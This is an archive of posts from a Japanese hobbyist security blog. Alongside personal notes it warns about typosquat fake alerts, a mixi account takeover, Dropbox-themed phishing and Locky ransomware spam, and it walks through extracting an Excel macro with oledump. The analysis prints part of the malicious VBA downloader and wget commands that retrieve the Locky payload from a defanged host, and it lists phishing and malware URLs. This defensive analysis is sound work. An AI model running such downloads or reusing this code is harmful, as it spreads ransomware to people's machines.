「セキュリティねた」カテゴリーアーカイブ

【雑記】みのり隊に入ってしまった。WarpDiveがイケてる。Bルート申し込み。他。

ども。こんばんは。

雑記です。

■おいら今日から隊員だ!

鈴木みのりオフィシャルファンクラブ「みのり隊」

に入ってしまいました。

タイミング悪くオープン記念グッズの注文はできませんでした・・・。

まぁそれはいいや。ファンクラブなんてまじで生まれて初めてだわ。

■WarpDiveがイケてる

WarpDiveが結構いけてます。

参考:攻殻機動隊の「タチコマ」が不正サイト接続をブロック – 「WarpDrive」実証実験がスタート

でも何を止めてくるのかはよくわからない。。。

以下レイバンのフィッシングサイトを表示した様子。

まぁそんなことはどうてもいいんだ。攻殻機動隊ファンとしては入れててもいいんじゃないかと。

なお、Chromeの拡張だけじゃなくて、常駐アプリも動くようです。
常駐アプリが落ちてるとブロック機能が使えないみたいですね。

以下常駐アプリを停止した状態。

■Bルート申し込み

2018/6/1ついに我が家もスマートメーターになりました!

ということで、Bルートサービスに申し込み!Wi-SUN対応のなにかをラズパイとかに付けるんだ!

詳細は後日書きたいですが、Bルート申し込みの前にでんき家計簿にも申し込みました。
※Bルート申し込みには、提供地点特定番号というのが必要で、通常なら電気の検針票に書いてるのですが、全部すててしまっており・・・。でんき家計簿から見られるらしい、ということで申し込みました。次回の検針票がポストに入るよりはでんき家計簿の登録完了のほうが早いかな、と思ったらビンゴでした。
Bルートは引き続きID待ちです。

■WordPressの不調が治ったぽい。

(解消)現在トップページの表示に時間がかかっています。

↑なおりました。JetPackの何かが悪さをしていたのか?postの取得にえらい時間がかかっていた模様です。

ではでは。またの機会に。

 

 

【雑記】WF-1000Xファームウェア更新とか散財のコト。他。

ども。こんばんは。

雑記です。

■WF-1000Xファームウェア 2.0.0

何が修正されたのかイマイチ不明。

普通に更新完了。なんやかんや20分くらいかかった。

このアップデートには直接関係ないのですが、HTV33(HTC U11)は、Android 8.0アップデート時にAACに対応していた模様です。

そもそもAndroid 8.0でaptXとかのネイティブ対応というのがあるみたいですね。

全く気づいていませんでしたが、これを機にSBCからAACに変更しました。音質の違いはあんまりわからない。。。

あと、開発者モードを有効にするといろいろ設定できます。

■散財のコト

えーと、遅ればせながらCrosswalkのCDを買いに行きました。

そしたら思いの外散財しました。。。

鈴木みのり/Crosswalk/リワインド ¥1,404
LiSA/LiSA BEST -Day- ¥4.610(※)
LiSA/LiSA BEST -Day- ¥4.610(※)
映画『聲の形』 [Blu-ray Disc] ¥5.050(※)
打ち上げ花火、下から見るか?横から見るか? [Blu-ray Disc] ¥4,660(※)

中身の話より前に少し。
↑で※のついてる商品ですが、ヨドバシ.comほほうが安いです。
買うときに全く気づきませんでした。。。

【ヨドバシ,comの価格(2018/5/27 19時時点)】
LiSA/LiSA BEST -Day- ¥4.380(-¥230)
LiSA/LiSA BEST -Day- ¥4.380(-¥230)
映画『聲の形』 [Blu-ray Disc] ¥4,610(-¥440)
打ち上げ花火、下から見るか?横から見るか? [Blu-ray Disc] ¥4,560(-¥100)

合計でちょうど¥1.000違います。

うーん。わざわざ店舗行かなきゃ良かったという気持ちになってきますね。。。。
ちなみにヨドバシ.comで注文して店舗受取りだと、安い方の金額になるんだとか。(ちゃんと調べてませんが。。。)

皆さんもヨドバシで買い物するときは気をつけてくださいね。

前置きが長くなりましたが、それぞれちょっとだけご紹介です。

・鈴木みのり/Crosswalk/リワインド
やっと買いました!

あまんちゅ!盤は店頭在庫残り1でした!さくら盤はもう少し在庫があるみたい。
うーん、本当にいい曲ですね。みのり隊(オフィシャルファンクラブ)入ろかな・・・。

・LiSA BEST -Day- & -Way-


LiSAのベストアルバム!
それぞれ初回限定版でBD付きです。
完全のノリで買ってしまいました。。。
ただ、LiSAの曲で「best day, best way」が一番好きなので、まぁこれは仕方ないのですね。タイトルにされちゃうと。

・映画『聲の形』 [Blu-ray Disc]


これも完全にノリで買ってしまいました。
ただ、漫画が出た頃にちょっと読んだ記憶があり、気にはなっていました。
まだ見てないですが・・・。

・打ち上げ花火、下から見るか?横から見るか? [Blu-ray Disc]


これは普通にかいました。
岩井俊二監督の原作ドラマがあるそうですね。
Amazon Primeビデオで見ることができましたので、あわせて見ました。
オリジナルの「なずな」役は奥菜恵だったんですね。

アニメのなずなと同様、ちょっとだけ大人びた感じが出てていいですね。

興味のある方はどうぞ

打ち上げ花火、下から見るか?横から見るか? – New Color Grading – 
http://amzn.asia/c7QaCSY

また、主題歌の「打上花火」と最後に流れる「Forever Friends」(※)はAmazon Musicで聞くことが出きます。
※オリジナルのREMEDIOS、アニメ版のDAOKOのカバーの両方とも聞けます。

うーん、Amazon Prime様様ですね。

内容はそこそこ楽しめました。

■ヨドバシ.comのドメインを間違えると・・・

おまけです。

さっき間違って「yodobasi.com」にアクセスしてしまったら、リダイレクトされて、偽警告に飛ばされてしまいました。

多分こんな感じでしょうか。

yodobasi[.]com

ww8.yodobasi[.]com

clearpe[.]com

87a2f88080603249073f-e05297f9016588483c7a43eab27a61b0.r12.cf1.rackcdn[.]com

みなさんも気をつけてくださいね。
※多分OSとかブラウザみてると思うので、それぞれの環境ごとに表示は違うと思います。

余計なことせずに閉じれば大丈夫です。ビープ音が鳴るのでびっくりしますが。。。

ちなみに「e.tre456_worm_osx」で検索してみるといくつかヒットしますね。

参考:Macのsafariで怪しげなウイルス警告が出た|toshiboo’s blog

最近こういう偽警告本当に多いです。まだちゃんと調べてないのですが、価格.comとかでも特定の広告クリックしてしまうと偽警告に飛ぶことがあるみたいです。
まとめサイトとかの広告なんかも偽警告にリダイレクトされるの多い気がしますね。

今度調べてみようかな。

ではでは。またの機会に。

 

 

 

 

 

おらのアカウントシリーズ – おらのmixiアカウントが乗っ取られただよorz

ども。こんばんは。

不名誉なシリーズですが・・・。

おらのTwitterのアカウントが乗っ取られただよorz

おらのFacebookのカウントが乗っ取られただよorz

に続いてmixiが乗っ取られました。

見事にレイバン・・・ではなく、オークリーしました。オークリーってなんだ?有名なのかな?

やられた内容としては恐らく以下の2つ

・つぶやきへのスパム投稿
・マイミクへのスパムメッセージ送信

と思われます。久々に自分のmixiの糞痛ぇ自己紹介やアイタタな日記をみて萎え萎えですが、ちょっと調査しました。

しっかしアイコンも懐かしいですね。大阪日本橋のキャラクター?だったかな・・・。

そしてマイミクの皆さんごめんなさいm(_ _ m)

【つぶやき】

つぶやいちゃった内容はこんな感じ。(2018/5/11 18:22につぶやきました。)
※原文も途中で切れています。

オークリー サングラス 今日限り活動特価2499円 三つを買うなら、配達無料 hxxp://www[.]oakosuns[.]com 利用期限は本日23時59分まで!お見逃しな
2018年5月11日 18:22 全体に公開 削除

【メッセージ】

件名

オークリー サングラス 今日限り活動特価2499円

本文

Oakleyのサングラスが好きですか? 
オークリー サングラス – 世界最高峰の眼部保護 
今日限り活動特価2499円!80%の割引 
三つを買うなら、配達無料 
hxxps://bit[.]ly/2It6Qwe
利用期限は本日23時59分まで!

URLは短縮URLサービスのbitly使われており、bitlyは後ろに「+」をつけると短縮URLの情報が見れるらしいので試してみました。

展開後はこんな感じです。

hxxp://www[.]oakosuns[.]com/?gocmkwht

「www[.]oakosuns[.]com」についてはオークリーの偽サイトみたいですね。

whois的には最近登録されたようで、中国系のようです。

日本語がちょっと怪しいけど、まぁまぁよくできてますね。
画像とかのソースとかまでは見ていません。
あと、メッセージ側のにはつぶやきと違って短縮URLの展開後に上記URLにパラメータが付与されていましたが、このパラメータの有り無しの違いは良くわかりません。出て来る商品が変わってる?気もしますね。そこまでは調査してません。

本物(http://jp.oakley.com/)?はこんな感じみたいです。

で、mixi上にもちょうとこの日お知らせが出ていました。

・スパム投稿にご注意ください。

まぁもうここ数年多方面からも言われてますが、結局これ使い回しが原因なんですよね。。

ブログには書いてませんでしたが、過去Yahooも同じパスワードでやられています笑
Yahooは2011年5月にやられてますね。まだその情報を使いまわしたリスト型攻撃がされてるんですかねー。

で、今回はどんな感じでやられたかを確認してみます。

mixiでの、セキュリティ関連の情報(ログイン履歴など)は、

設定変更→アカウントアクティビティから見ることができます。

こんな感じになっています。(黒塗りは自分です。

ログイン失敗は試した感じ記録されないようです。まぁ一発で入られたんだろうな。

)

ログイン元IPアドレス(2種類ありました)

2018/5/11 11:24
60[.]154[.]180[.]74  (softbank060154180074[.]bbtec[.]net)

2018/5/11 18:22←おそらくつぶやいた方
126[.]73[.]109[.]228 (softbank126073109228[.]bbtec[.]net)

まぁ、多分普通のPPPoE用のIPアドレスでしょうねぇ。

とりあえず、パスワードは変更しました。

ちなみに今回やられたメールアドレスで、パスワードの流出が調べられる「Have I Been Pwned」でチェックしてみると・・・

オーノーorz

皆さんも使いまわしはやめましょうね。

ではでは。またの機会に。

ーー追記ーー

今回は友人からの指摘で気づきましたが、こんなメールがちゃんと届いていました。

あと、そこそこ被害が報告されてますね。

mixiにリスト型攻撃: 独房の中

Dropboxを騙るスパムがきた

ども。こんにちは。

見に覚えのないアカウント確認メールが何通か届きました。

From: Dropbox <no-reply@dropbox.com>
件名:Please verify your email address
本文:

Hi [xxx],

We just need to verify your email address before your sign up is complete!

Verify your email

Happy Dropboxing!

送信元MTAはこんな感じ。4通か同じ内容のものが来ていました。

1通目
Received: from customer-COB-186-70.megared.net.mx (unknown [200.52.186.70])
2通目
Received: from [196.0.102.250] (unknown [196.0.102.250])
3通目
Received: from 189.215.225.170.cable.dyn.cableonline.com.mx
(189.215.225.170.cable.dyn.cableonline.com.mx [189.215.225.170])
4通目
Received: from cliente87.rede148.ftth.d1telecom.com.br

「Verify your email」がリンクになっています。

この辺に飛ばされる模様。
※4通とも違う模様。

1通目
hxxp://campusvoltaire[.]com/fdropbox.html

2通目
hxxp://fpotamitis[.]gr/fdropbox.html

3通目
hxxp://autoecoledufrene[.]com/fdropbox.html

4通目
hxxp://farthurdenniswilliams[.]com/fdropbox.html

ちょっと、出先のため詳細にソースを終えていませんが、かなり精巧で間違ってクリックしそうでした。。。

ご注意ください。

ではでは。またの機会に。

なんか珍しい7z形式の添付付きスパムは新しいタイプのLocky(.lukitus)

ども。こんばんわ。

久々にスパムネタ。

連続で7zの添付ファイル付きスパムが来ました。

結論両方ともvbsからのLockyでした。
拡張子が「.lukitus」になるLockyって最近流行りなんですかね?
別のマクロウイルスでもLockyがきてました。

一昨日くらいから増えた印象です。

ちょうどそのくらいからネットにも出回っていますね。
※うちのサーバにも最新っぽいマルウェアきててちょっとうれしい。

【関連情報】
Locky ransomware resurges with Diablo and Lukitus
https://www.webroot.com/blog/2017/08/17/locky-ransomware-resurges-diablo-lukitus/
http://www.zdnet.com/article/locky-ransomware-is-back-from-the-dead-again-with-new-diablo-variant/

 

一つ目

ファイル名:IMG_6939.7z
MD5:8e160db33127cd5bfe2f4bc08ca3fd8c
SHA1:ef234c0cbdffd032023985a9895ce98ac612da5c

7zを解凍すると以下のファイルが出て来る。
至って普通のダウンローダーって感じですね。

ファイル名:IMG_0109.vbs
MD5:dd4dfd04a5d9bea3852834612439c7bd
SHA1:8c00b7bb8dd4ad4f6520eacaf7540d9af703d10a

https://malwr.com/analysis/MDcxNjJkYmFlYmZkNGM5N2JmMDgwZTJiYmViNzQ4MTQ/

落としてくるファイルがこれ。

https://malwr.com/analysis/Y2ViM2QxMDhiY2VhNGVlZDliODg4ZWIwYzc5OTU3ZjY/

Malwrだとわかりにくいですが、こっちだとはっきり暗号化されてるのがわかりますね。

https://www.hybrid-analysis.com/sample/6d5d672d9e8402a4e6a2309c71443e93efccccee8f9959afc24ae9a89fe2935c?environmentId=100

これも、Lockyですね。拡張子を「.lukitus」にするタイプっぽいですねー。

https://www.virustotal.com/ja/file/6d5d672d9e8402a4e6a2309c71443e93efccccee8f9959afc24ae9a89fe2935c/analysis/

2つ目

同じくダウンローダーでした。
落としてくるファイルはこれみたい。

https://www.hybrid-analysis.com/sample/ee222c0b66961c8b10ab2f92af2872d72e369a4cb315b496b0343b6004c19eed?environmentId=100

これも、Lockyですね。拡張子を「.lukitus」にするタイプっぽいですねー。

なんで、7zなんだろう。

ではでは。またの機会に。

 

 

Macネタ – 13 – Bitdefenderなかなかいい!

ども。こんばんは。

昨日入れたBitdefenderですが、なかなかいいじゃないですか。

というのも、今まで来ていたスパムメールの添付ファイル(おもにマクロウイルス)って、Integoじゃ全く反応しなかったんですが、ちゃんと反応しますね。

ん?これはIntegoがいまいちだっただけなのか・・・?

まぁmacOSには影響ないマクロウイルスではありますが。。。

これは買いますわ。

ではでは。またの機会に。

Macネタ – 12 – macOSのAntiVirusとかFortiClientとか

ども。こんばんは。

さて、久々のMacネタはアンチウイルス(ウイルス対策)です。

さようならIntego
こんにちはFortiClient
やっぱりさようならFortiClient
こんにちはBitdefender

という話です。

まずは、Intego。先日有効期限が切れました。
※購入時の話はここで。

で、Intego Mac Internet Security X9やめます。

パターン更新頻度もあんまり多くなかったし、パーソナルファイアウォール(プロセスの通信があるたびに許可、拒否を聞いてくれる)は良かったんですが、ちょっといいことも悪いこともなかったかなという印象。
そんなにパフォーマンスは悪くなかった気がしますけどね。

なので、まずはアンインストールします。

アンインストールはインストール時のdmgからやらないと行けないとサイトに書いていました。
dmg残しておいてよかったよ。

■Intego Mac Internet Securityのアンインストール

さて、アンインストールはすんなりいきました。

■FortiClientのインストール

これ、かなりハマりました。

先に要点をまとめますと・・・

・FortiNetのダウンロードサーバが弱い!何度もチャレンジすべし
・FortiOS(FortiGate側のバージョン)とFortiClientのバージョンがずれてるとAVとかが有効にならずVPN接続のみになってしまう
・FortiGate側は自分のFortiOSに対応してるかどうかなど関係なく最新のFortiClientに更新されてしまう。
※うちの場合だと、FortiOS 5.2だったのに、FortiClient 5.6系になっていた。以下参考画面。


・古いFortiClientはダウンロードできない。SCSKさんのサイトからダウンロードする
※SCSKさん毎度感謝です!
・FortiOS 5.2に対応する最新のFortiClientは5.4.3(FortiClient_5.4.3.529_macosx.dmg)だった。
※リリースノートでは5.4.3だとすでにFortiOS 5.2は対応してないように読み取れるが実際はうまく行ったっぽい
・FortiGateで、FCT-Accessを有効にしておく(←これは認識していた)。FortiClientがFortiGateと通信するポートが8010。これ、ちゃんと登録時に「IPアドレス:8010」で登録しないと、デフォルトでは「8013」に通信しに行くために通信できない。これハマった。

まずは、FortiClientをFortiGateの画面からダウンロードします。

※ライセンスはデバイス1台につき10クライアントまで無償。ただしサポートは受けられない。(コミュニティベース)

dmgからインストールします。

さて、こっからハマりまくります。

・「Failed to connect to the update server.」と「You have no authority to get update.」のエラーのどちらかが繰り返しでる・・・。色々悩んだが結局何十回かやっていればダウンロードできた。

・うまくいったパターン。

・インストールします

とりあえず、

さて、登録しますが、ここでまたハマります。
※ちなみにこれって大量に配布するときはコマンドラインオプションとかで自動化できるのかな。

・「FortiGate or FortiClient Enterprise Management Server(EMS) was not found.」とな。
で、これはポート番号の問題です。

なので、こんな感じでポート「8010」指定でどうぞ。

うまく行けば登録できます。

ふぅ。あれ?アンチウイルスとかでなくね?あれ?あれ?

はい。冒頭で書きましたとおり、FortiClientのバージョンとFortiGate(FortiOS)のバージョンが大きくずれていたことでAVとかが出てきませんでした。。。

FortiClientのリリースノートにはちゃんと対応するFortiOSのバージョンなどが記載されています。
※それならFortiGate側もちゃんと自分のFortiOSに対応したFortiClientのバージョンにとどめておいてほしい・・・

しょうがないので、SCSKさんのサイトからちょっと古いFortiClientをいれて見たらこんな感じ!いい感じ!

で、少しテストしてみました。

・AV(アンチウイルス)

これね、ファイル消してくれない。。いわゆる削除とか駆除とか隔離してくれない。。。
これはFortiClientが古いからなのか?ちょっとがっかり。

・URLフィルタ

キャプチャないですが、どうもFortiGateに向かってリダイレクトされるみたいです。
証明書違反でアクセスできませんでしたが、多分そんな感じ。

面白いのは、FortiGateのWebフィルタのプロファイルがそのまま当てられるところ?かな。

また、FortiClientのプロファイルは、どのデバイスカテゴリに当てるか?を指定できます。

ファイアウォールのルールっぽく、上から評価されるのかな?

また、当たっているポリシーはMonitorでも確認できます。

とりあえず、ここまで。なのですが、やっぱりファイル消えないってのはちょっと・・・

また、FortiClientも古いものしか使えないということもあり、ここまでやっておきながらFortiClientは見送ります。。。

アンインストールして、最新版に入れ直してVPN用に引き続き使います。
※特にもうFortiGateにはRegistもしないかな・・・。

手順は省きますが、FortiClient上からDisconnectして、macOSのアプリケーションからアンインストーラを実行します。

さて続いて・・・

■Bitdefenderを入れる

特に選んだ理由はないですが、いろんなサイトで評判が良さそうなので。

ただ、パーソナルファイアーウォールなさそうなんだよなー。

「Total Security 2017」っていうエディションが、ファイアウォールとかの機能も乗ってそうだけど、結局それを買ってもmacOSはAntivirus for Macになってしまうっぽいですね。

ということで、「Bitdefender Antivirus for Mac」の体験版をいれてみます。

お、ちょっとおしゃれ。

なんも起きねーなと思ったら、こんな画面が出ていました。

終わったらこんなアイコンが出ていました。

スーパーセキュリティ セントラルってなんや・・・

とりあえずアカウントを作ってログイン。
お、サブスクリプションの追加とやらができますね。。

えっと、誤字ってますよー。
使用版とやらを開始します。

追加された。

ランサムウェア対策の設定。一旦飛ばす。

タイムマシンもランサムウェアから守ってくれるらしい。一旦飛ばす。

確認が出てきた。

とりあえず動いた。

とりあえずここまで!

ではでは。またの機会に。

 

 

 

 

 

結局CloudFlareを導入した。

ども。こんばんは。

結局いれました。

前回:CloudFlareの導入を検討中。

ただ、まだSSL証明書はできてないみたいですね。

とりあえずDNSが伝播するのを待ってますが、週末にはオンプレDNSへの通信は閉じる予定。

これ、オリジンのサーバのポートって80と443のみなのかなー。
あとやっぱりSMTPとかは通れないよねきっと。

ここ柔軟にできると便利なんだけどなー。いかんせんグローバルIP少ないしな〜。

その辺もまた今度。

— 追記

無事DNSも伝播れされてActiveになりました。

とりあえず外部からのメール配送とかもOkですね。

今のところ、CloudFlare -> Incapsula -> Webサーバになっています。
※やっぱどうやってもIncapsulaをフロントにできませんでした。
一瞬CloudFlareでCDNを有効にしてIPアドレスを引いてみて、それをIncapsulaのオリジンに設定とかしてみましたけど、やっぱりCloudFlare側でCDN(ってかリバプロ?)が有効じゃないと受け付けてくれませんね。まぁ仕方ない。

メモ:SSLの設定をしよう。証明書はちゃんとCloudFlare発行のやつをoriginサーバにも入れる?
メモ:DNSレコード修正、MXはmail.に変更する。したらメール配送テスト忘れずに。

ではでは。またの機会に。

CloudFlareの導入を検討中。

ども。こんばんは。

CloudFlareいいなーと思ってました。

・SSL証明書が無料。(共有たぶんSANS。50ユーザまで一緒になるらしい)

今は、IncapsulaのFreeプランです。

ぱっと見違いとして、

・Incapsulaは、Freeでも国ベースのBlockができるが、CloudFlareはできない。
・CloudFlareはDNS全部預ける感じになるが、Incapsulaは、CNAMEで指定すればいい。
・Incapsulaはフリーでも2要素認証が使える。今もWordPressに使ってるんだよなー。

さて、SSL証明書には猛烈に魅力がありますよね。

しかもどうもワイルドカードなので、配下のドメイン全部に使ってもいいぽい。

うーむ。正直DNSもうオンプレいやだと思ってた俺には朗報か。。。

まぁIncapと多段で組んでもいいかなとは思ったけど、DNSをCloudFlareに持っていかれるとなると、どうしてもIncapが後ろだなー。

うーん。とりあえず足りないレコードを追加して準備万端にはなったけど、NSレコード変える勇気がまだ出ない。。

ではでは。またの機会に。

 

添付ファイル付きスパム動向変わった?&Macでマクロ解析

ども。こんばんは。

今日くらいから、docやxlsなど、後ろに”m”が付かないファイルが増えたようです。

おいらん家に届くのは、docmかzip(中身JS)のパターンが多かったのですが、doc/xlsが増えた気がしますね。

例えば今日来た

From:erna[.]collier at gmail[.]com
Subject:Receipt 01935-4862

#本文なし

添付:Receipt 94213-571.xls (md5:806f976990044461e562e29b36b25346)

差出人は@gmailで件名が「Receipt xxxxxxx」※(xxは数字っぽい)な感じでdoc(docmじゃないよ)も来ていた。同じく本文なし。

xls自体は↓これの模様。

https://malwr.com/analysis/MGQ5Mzk3NTA1NDNkNDIzMDk3YmFjOTYwMjFkZDQwMjE/

ヘッダ見てると、85[.]185[.]254[.]34(イラン)から来てるっぽですね。
セオリー通りセカンダリのMTAに配送されていました。いやらしい。

なんかいつもと違う気がするので、たまにはoledump.pyあたりでマクロ(VBA)を取り出して見てみますか。
※実はおいら現役時代VBA職人でした。主にAccess、Excelの。

そういえばmacOSにはPythonが最初から入っているんでしたっけ。

んじゃまず、oledumpに必要なolefileを入れます。

easy_installで入れても良さそうですが、とりあえずpipを入れて、pip経由でolefileを入れてみます。

# easy_install pip

そしたらpipでolefileを入れます。

# pip install olefile

oldedumpは以下からダウンロード。

https://blog.didierstevens.com/programs/oledump-py/

そしたらまずはストリーム(中身)を見てみる。

$ python2.7 oledump.py Receipt\ 94213-571.xls

A: xl/vbaProject.bin
A1:       556 ‘PROJECT’
A2:       119 ‘PROJECTwm’
A3: M   10264 ‘VBA/Module1’
A4: M    4874 ‘VBA/Module2’
A5: M    6706 ‘VBA/Module3’
A6:      5114 ‘VBA/_VBA_PROJECT’
A7:      2082 ‘VBA/__SRP_0’
A8:       385 ‘VBA/__SRP_1’
A9: 508 ‘VBA/__SRP_2’
A10:       154 ‘VBA/__SRP_3’
A11:       154 ‘VBA/__SRP_4’
A12:       471 ‘VBA/__SRP_5’
A13:       104 ‘VBA/__SRP_6’
A14:       204 ‘VBA/__SRP_7’
A15:       124 ‘VBA/__SRP_8’
A16:       296 ‘VBA/__SRP_9’
A17:       612 ‘VBA/dir’
A18: m     976 ‘VBA/\xd0\x9b\xd0\xb8\xd1\x81\xd1\x821’
A19: M    2103 ‘VBA/\xd0\xad\xd1\x82\xd0\xb0\xd0\x9a\xd0\xbd\xd0\xb8\xd0\xb3\xd0\xb0’

“M”がついてる、A3,A4,A5,A19あたりがマクロかと。

-s オプションでストリームを指定して-vもつけてきれいに出力。

以下ストリームA3の例。

$ python2.7 oledump.py -s A3 -v Receipt\ 94213-571.xls > A3

こんな感じになります。ちなみにエディタはVisual Studio Codeです。フリーなのに高機能で便利!

mac-macro-malware

ダウンロードの処理はストリームA4(Module2)でやってるみたいです。

Attribute VB_Name = “Module2”

Public Sub VerCadenaPermiso(permiso As String)

(略)

moyaMANUNA4 = “hxxp://veganvet[.]net/g76ub76”

If Application = “Microsoft Excel” Then
moyaMANUNADAcdaw.Open moyaMANUNAPLdunay(5), moyaMANUNA4, False

moyaMANUNADAcdaw.setRequestHeader moyaMANUNARH, “Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)”

moyaMANUNADAcdaw.Send

これ、普通にwgetしても403ですね。

$ wget hxxp://veganvet[.]net/g76ub76   [/var/temp/kentai]
–2016-09-30 23:32:54–  hxxp://veganvet[.]net/g76ub76
veganvet[.]net をDNSに問いあわせています… 69.195.124.82
veganvet[.]net|69[.]195[.]124[.]82|:80 に接続しています… 接続しました。
HTTP による接続要求を送信しました、応答を待っています… 403 Forbidden
2016-09-30 23:32:54 エラー 403: Forbidden。

なので、書いてあるUser-Agentを指定してみます。

$ wget hxxp://veganvet[.]net/g76ub76 –user-agent=”Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)”
–2016-09-30 23:39:57–  hxxp://veganvet[.]net/g76ub76
veganvet[.]net をDNSに問いあわせています… 69[.]195[.]124[.]82
veganvet[.]net|69[.]195[.]124[.]82|:80 に接続しています… 接続しました。
HTTP による接続要求を送信しました、応答を待っています… 200 OK
長さ: 204800 (200K) [text/plain]

`g76ub76′ に保存中

100%[======================================>] 204,800     58.5K/s 時間 3.4s    

2016-09-30 23:40:01 (58.5 KB/s) – `g76ub76′ へ保存完了 [204800/204800]

ハッシュは

md5:1e0ca42235f386c42a7e5f51ca9b47b6
sha256:
07b1a04405d284debd514007e90761f4bb3bf638ae9db73a9a2794f682cb9956

おなじみLockyでした。

https://www.virustotal.com/ja/file/07b1a04405d284debd514007e90761f4bb3bf638ae9db73a9a2794f682cb9956/analysis/

拡張子からマクロを表す”m”を外したことで何か変わったのかな?

今回はexcelからマクロだけを抽出して調査しましたが、ちゃんとExcelで開くと今までと違う何かがあるのかな?

それをやるには色々環境構築が面倒なので今日はここまで!

ではでは。またの機会に。